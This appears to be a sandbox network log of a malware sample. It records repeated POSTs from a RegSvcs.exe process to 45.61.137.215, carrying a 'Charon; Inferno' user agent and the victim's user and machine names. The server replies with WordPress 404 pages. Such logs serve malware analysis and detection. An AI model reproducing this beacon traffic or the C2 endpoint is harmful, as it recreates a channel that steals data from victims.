May 29, 2024 15:44:36.461078882 CEST	1236	IN	Data Raw: 70 65 6d 6f 6a 69 26 26 65 2e 74 77 65 6d 6f 6a 69 26 26 28 74 28 65 2e 74 77 65 6d 6f 6a 69 29 2c 74 28 65 2e 77 70 65 6d 6f 6a 69 29 29 29 7d 29 29 7d 28 28 77 69 6e 64 6f 77 2c 64 6f 63 75 6d 65 6e 74 29 2c 77 69 6e 64 6f 77 2e 5f 77 70 65 6d Data Ascii: pemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings);/* ... */</script><style id='wp-emoji-styles-inline-css' type='text/css'>img.wp-smiley, img.emoji {display: inline !important;border: no
May 29, 2024 15:44:36.461085081 CEST	448	IN	Data Raw: 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 72 65 64 3a 20 23 63 66 32 65 32 65 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 3a 20 23 66 66 36 39 30 30 3b 2d 2d 77 Data Ascii: -color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--preset--color--light-green-cyan: #7bdcb5;--wp--preset--color--vivid-green-cyan: #00d084;--wp--preset--color
May 29, 2024 15:44:36.462357998 CEST	1236	IN	Data Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64 Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
May 29, 2024 15:44:36.462392092 CEST	1236	IN	Data Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29 Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
May 29, 2024 15:44:36.462402105 CEST	1236	IN	Data Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important
May 29, 2024 15:44:36.462408066 CEST	672	IN	Data Raw: 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 62 6c 61 63 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b Data Ascii: ar(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-background-color{background-color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-background-color{background-color: var(--wp--preset--color--white) !important

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.9	49772	45.61.137.215	80	7532	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
May 29, 2024 15:44:36.658231020 CEST	246	OUT	POST /index.php/3b1tenbkyj HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.137.215 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: DCC85916 Content-Length: 145 Connection: close
May 29, 2024 15:44:36.665555954 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
May 29, 2024 15:44:39.150901079 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Wed, 29 May 2024 13:44:37 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found – separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper » Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper » Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
May 29, 2024 15:44:39.150947094 CEST	1236	IN	Data Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22 Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/! This file is auto-generated /!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
May 29, 2024 15:44:39.150949955 CEST	1236	IN	Data Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
May 29, 2024 15:44:39.150960922 CEST	1236	IN	Data Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21 Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
May 29, 2024 15:44:39.150968075 CEST	896	IN	Data Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
May 29, 2024 15:44:39.151000977 CEST	1236	IN	Data Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64 Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
May 29, 2024 15:44:39.151032925 CEST	224	IN	Data Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29 Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--w
May 29, 2024 15:44:39.151041031 CEST	1236	IN	Data Raw: 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6d 65 64 69 75 6d 3a 20 32 30 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6c 61 72 67 65 3a 20 33 36 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 Data Ascii: p--preset--font-size--medium: 20px;--wp--preset--font-size--large: 36px;--wp--preset--font-size--x-large: 42px;--wp--preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5
May 29, 2024 15:44:39.151058912 CEST	224	IN	Data Raw: 2d 2d 62 6c 61 63 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 63 Data Ascii: --black) !important;}.has-cyan-bluish-gray-color{color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset-
May 29, 2024 15:44:39.151417017 CEST	1236	IN	Data Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.9	49773	45.61.137.215	80	7532	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
May 29, 2024 15:44:39.311748028 CEST	246	OUT	POST /index.php/3b1tenbkyj HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.137.215 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: DCC85916 Content-Length: 145 Connection: close
May 29, 2024 15:44:39.317655087 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
May 29, 2024 15:44:41.853147984 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Wed, 29 May 2024 13:44:39 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found – separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper » Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper » Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
May 29, 2024 15:44:41.853173018 CEST	224	IN	Data Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22 Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/! This file is auto-generated /!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessio
May 29, 2024 15:44:41.853192091 CEST	1236	IN	Data Raw: 6e 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 6f 2c 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 74 29 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 28 65 2c 74 2c 6e 29 7b 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30 Data Ascii: nStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.wid
May 29, 2024 15:44:41.853204012 CEST	1236	IN	Data Raw: 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 29 7d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 50 72 6f 6d 69 73 65 26 26 28 6f Data Ascii: "script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",
May 29, 2024 15:44:41.853230000 CEST	1236	IN	Data Raw: 65 70 74 46 6c 61 67 26 26 21 6e 2e 73 75 70 70 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d Data Ascii: eptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything\|\|(n.readyCallback(),(e=n.source\|\|{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&
May 29, 2024 15:44:41.853235960 CEST	672	IN	Data Raw: 69 64 3d 27 67 6c 6f 62 61 6c 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 62 6f 64 79 7b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 62 6c 61 63 6b 3a 20 23 30 Data Ascii: id='global-styles-inline-css' type='text/css'>body{--wp--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red:
May 29, 2024 15:44:41.853238106 CEST	1236	IN	Data Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64 Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
May 29, 2024 15:44:41.853259087 CEST	1236	IN	Data Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29 Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
May 29, 2024 15:44:41.853271008 CEST	448	IN	Data Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important
May 29, 2024 15:44:41.853395939 CEST	1236	IN	Data Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.9	49774	45.61.137.215	80	7532	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
May 29, 2024 15:44:42.013115883 CEST	246	OUT	POST /index.php/3b1tenbkyj HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.137.215 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: DCC85916 Content-Length: 145 Connection: close
May 29, 2024 15:44:42.018089056 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
May 29, 2024 15:44:44.582916975 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Wed, 29 May 2024 13:44:42 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found – separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper » Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper » Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
May 29, 2024 15:44:44.582964897 CEST	224	IN	Data Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22 Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/! This file is auto-generated /!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessio
